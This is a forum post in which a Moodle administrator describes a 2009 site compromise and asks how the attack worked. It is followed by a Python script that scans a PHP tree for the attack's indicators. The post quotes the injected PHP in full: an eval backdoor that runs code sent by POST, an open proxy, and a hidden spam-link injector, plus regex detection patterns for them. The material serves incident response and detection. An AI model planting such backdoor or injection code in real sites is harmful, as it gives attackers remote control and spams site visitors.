Hello,
we are using a fairly old version of Moodle (Moodle 1.5.2 + (2005060222)) and experienced an attack on 1/27/2009. The attacker modified at least two source files and created one file:
1) config.php (altered on 1/27/2009)
$links = '
xepxep
<a href=http://aims2.ideal.asu.edu/?search=viagra>viagra</a>
<a href=http://aims2.ideal.asu.edu/?search=buying+viagra>buying viagra</a> [...]';
This string contains about 600 further lines of links.
Also there was a function included, which probably places those links on every requested page:
function output_callback($str)
{
GLOBAL $links;
// find the opening <body> tag and insert the hidden link block right after it
preg_match("|<body[^>]*>|",$str,$arr);
return str_replace($arr[0],$arr[0].'<i style="display:none">'.$links.'</i>',$str);
}
function get_page($url)
{
return file_get_contents($url);
}
// backdoor: runs arbitrary PHP sent in the POST parameter "code"
if(isset($_POST['code']) && $_POST['code'])
{
eval(stripslashes($_POST[code]));
exit;
}
// open proxy: fetches and returns any URL given in the GET parameter "proxy"
if(isset($_GET['proxy']) && $_GET['proxy'])
{
print get_page($_GET['proxy']);
exit;
}
// buffers all page output and passes it through output_callback when flushed
ob_start ('output_callback');
2) A file was created 1/27/2009 in root: in.php, which was empty
3) index.php (root) was altered on 2/2/2009
The following lines were included:
<?php
?>
<!-- tdooqzinaakluixwons -->
<u style="display:none;\">"hackcheckstr"</u>
<!-- tdooqzinaakluixwons -->
--------
<?php
print_footer('home'); // Please do not modify this line
?>
I assume that this is somehow a Moodle vulnerability, because if you enter "hackcheckstr" in Google you will get a whole bunch of Moodle pages, which all seem to be affected.
My actions:
1) replaced all source files with a non-infected backup copy
2) changed all passwords (moodle-admin, ftp, mysql, ssh)
3) chmod 440 config.php and index.php (all other files are 755)
My questions:
1) Is this a known issue and how can it be resolved?
2) Does anybody know how this attack is conducted?
3) Was there possibly more damage (other source files, data folder, DB corruption)?
4) Do you think my actions will prevent further hacks of the same type?
Thanks a lot!
Christian
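Added example, not part of the post above and not Moodle code: a small Python scanner that looks through a PHP tree for the indicators quoted in the post (the eval/stripslashes backdoor, the ob_start('output_callback') hook, the open proxy, the hidden-link block, the "hackcheckstr" marker and the tdooqzinaakluixwons comment), flags empty .php files like in.php, and lists files modified after a given time so the restored backup can be compared against the live tree. The indicator names, the sample files it builds in a temporary directory and the placeholder link host are my own constructions for the demonstration.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Indicator patterns derived from the code quoted in the post.
# The names on the left are labels chosen for this example.
INDICATORS = {
    "eval_post_backdoor": re.compile(r"eval\s*\(\s*stripslashes\s*\(\s*\$_POST\["),
    "output_callback_hook": re.compile(r"ob_start\s*\(\s*['\"]output_callback['\"]\s*\)"),
    "open_proxy": re.compile(r"file_get_contents\s*\(\s*\$_GET\["),
    "hidden_link_block": re.compile(r'<i style="display:none">'),
    "hackcheckstr_marker": re.compile(r"hackcheckstr"),
    "comment_marker": re.compile(r"<!--\s*tdooqzinaakluixwons\s*-->"),
}

SCAN_SUFFIXES = (".php", ".html", ".htm")


def scan_tree(root):
    """Return [(relative_path, [indicator, ...])] for every file under root that
    matches at least one indicator or is an empty .php file (the post's in.php
    was empty, which is unusual for a script in the web root)."""
    root = Path(root)
    findings = []
    for p in sorted(root.rglob("*")):
        if not p.is_file() or p.suffix.lower() not in SCAN_SUFFIXES:
            continue
        text = p.read_text(errors="replace")
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if p.suffix.lower() == ".php" and p.stat().st_size == 0:
            hits.append("empty_php_file")
        if hits:
            findings.append((p.relative_to(root).as_posix(), hits))
    return findings


def files_modified_since(root, epoch_seconds):
    """Sorted relative paths of scanned files whose mtime is newer than
    epoch_seconds; run it with the date of the last known-good backup."""
    root = Path(root)
    return sorted(
        p.relative_to(root).as_posix()
        for p in root.rglob("*")
        if p.is_file() and p.suffix.lower() in SCAN_SUFFIXES
        and p.stat().st_mtime > epoch_seconds
    )


# Constructed sample files modelled on the snippets in the post (placeholder host).
CONFIG_PHP_SAMPLE = r'''<?php
$CFG->dbtype = 'mysql';
$links = '<a href=http://example.invalid/?search=viagra>viagra</a>';
function output_callback($str)
{
GLOBAL $links;
preg_match("|<body[^>]*>|",$str,$arr);
return str_replace($arr[0],$arr[0].'<i style="display:none">'.$links.'</i>',$str);
}
if(isset($_POST['code']) && $_POST['code'])
{
eval(stripslashes($_POST[code]));
exit;
}
ob_start ('output_callback');
'''

INDEX_PHP_SAMPLE = r'''<?php
?>
<!-- tdooqzinaakluixwons -->
<u style="display:none;\">"hackcheckstr"</u>
<!-- tdooqzinaakluixwons -->
<?php
print_footer('home'); // Please do not modify this line
?>
'''


def demo():
    """Build the constructed sample tree in a temp dir, scan it and return
    (findings_dict, recently_modified_list)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "lib").mkdir()
        (root / "config.php").write_text(CONFIG_PHP_SAMPLE)
        (root / "in.php").write_text("")  # empty file, as in the post
        (root / "index.php").write_text(INDEX_PHP_SAMPLE)
        (root / "lib" / "weblib.php").write_text("<?php\nfunction print_footer($x) { echo $x; }\n")
        # Backdate the clean file so the mtime check separates it from the touched ones.
        os.utime(root / "lib" / "weblib.php", (0, 0))
        findings = dict(scan_tree(root))
        recent = files_modified_since(root, time.time() - 3600)
        return findings, recent


if __name__ == "__main__":
    found, changed = demo()
    for path, hits in found.items():
        print(f"{path}: {', '.join(hits)}")
    print("modified in the last hour:", changed)
```

Run it against the real tree with scan_tree("/path/to/moodle") and files_modified_since(root, backup_timestamp); string matching only catches this particular variant, so a diff of the restored backup against the live files remains the reliable check.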